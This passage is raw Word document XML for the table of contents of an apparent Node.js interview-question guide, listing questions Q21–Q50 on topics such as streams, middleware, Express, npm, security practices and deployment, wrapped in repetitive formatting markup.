                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CE415CE" w14:textId="4C833C3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05" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q21. What is Node.js, and how is it different from other server-side technologies?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25</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05256059" w14:textId="65BFB5E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06" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q22. Explain the concept of event-driven programming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25</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05EDE803" w14:textId="64E8DB8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07" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q23. How do you handle errors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26</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12EA7EFA" w14:textId="2DDF6F9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08" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q24. How do you create a server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26</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49160606" w14:textId="6697920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09" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q25. How do you read and write files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_Toc178383209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26</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CF1FFC6" w14:textId="7C2109B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0" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q26. What are streams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26</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AEE48D7" w14:textId="07BEDBB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1" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q27. What is middleware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28</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="426D27F6" w14:textId="5558CDA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2" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q28. How do you create and use custom modules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29</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70A2E99F" w14:textId="5C0B4AA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3" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q29. How do you perform unit testing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30</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34E97020" w14:textId="274BBE2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4" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q30. Explain the concept of callbacks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32</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A7F3CBC" w14:textId="6E6D84E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5" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q31. How do you implement authentication and authorization in a Node.js application?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32</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E49F294" w14:textId="604739B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6" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q32. What is the purpose of the package.json file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32</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75EC0263" w14:textId="73C26A4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7" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q33. How do you handle database connections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33</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A247C15" w14:textId="0063BA7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8" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q34. What is the purpose of the Express.js framework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34</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64B93606" w14:textId="50DDAC5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19" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q35. Explain the concept of asynchronous programming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_Toc178383219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36</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="305A82E2" w14:textId="2AE4105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20" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q36. How do you use the npm package manager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36</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B5BF7DD" w14:textId="6C2CDB8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21" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q37. What is the difference between process.nextTick() and setImmediate()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36</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32409202" w14:textId="50EC9FA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22" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q38. How do you deploy a Node.js application to a production server?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37</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="722E1D75" w14:textId="054E8DD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23" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q39. What are the best practices for securing a Node.js application?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39</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E2CFD53" w14:textId="033446E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24" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q40. How do you optimize the performance of a Node.js application?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40</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EFF41AD" w14:textId="24D26CFC"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25" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>senior, experienced candidates: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43</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="318772AC" w14:textId="2BE2C58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26" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q41. What are streams in Node.js, and how can they be used?</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43</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34470EBF" w14:textId="3BB3547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27" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q42. What is clustering in Node.js, and how can it be used to improve application performance?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43</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="250D7C32" w14:textId="704F135A"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28" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q43. What are the differences between the "require" and "import" statements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44</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11625698" w14:textId="46A8E47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29" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q44. How does Node.js handle asynchronous code execution, and what are the best practices for writing asynchronous code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_Toc178383229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45</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04A0C330" w14:textId="34C5D37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30" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q45. What is the role of the "module" object in Node.js, and how can it be used to create reusable code?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45</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="266CC43B" w14:textId="7F17CE7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31" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q46. What are the different types of Node.js modules, and how can they be used to build scalable applications?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45</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35B0E353" w14:textId="4399A398"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32" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q47. How does Node.js handle errors, and what are some common error-handling techniques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46</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E0DC376" w14:textId="1727F44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33" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q48. How can Node.js be used to create real-time applications, such as chat applications or real-time dashboards?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48</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51107DAD" w14:textId="1406863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34" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q49. What is GraphQL, and how can it be used with Node.js to build APIs?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48</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00B240B3" w14:textId="0B7EB66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35" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q50. What are some best practices for deploying Node.js applications, and how can Node.js be optimized for performance?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51</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5168C740" w14:textId="48EC3BDE"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36" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Toptal NodeJS Questions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54</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BB0D33E" w14:textId="5E1E477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37" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How does Node.js handle child threads?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54</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09A4D389" w14:textId="53B5A48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38" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
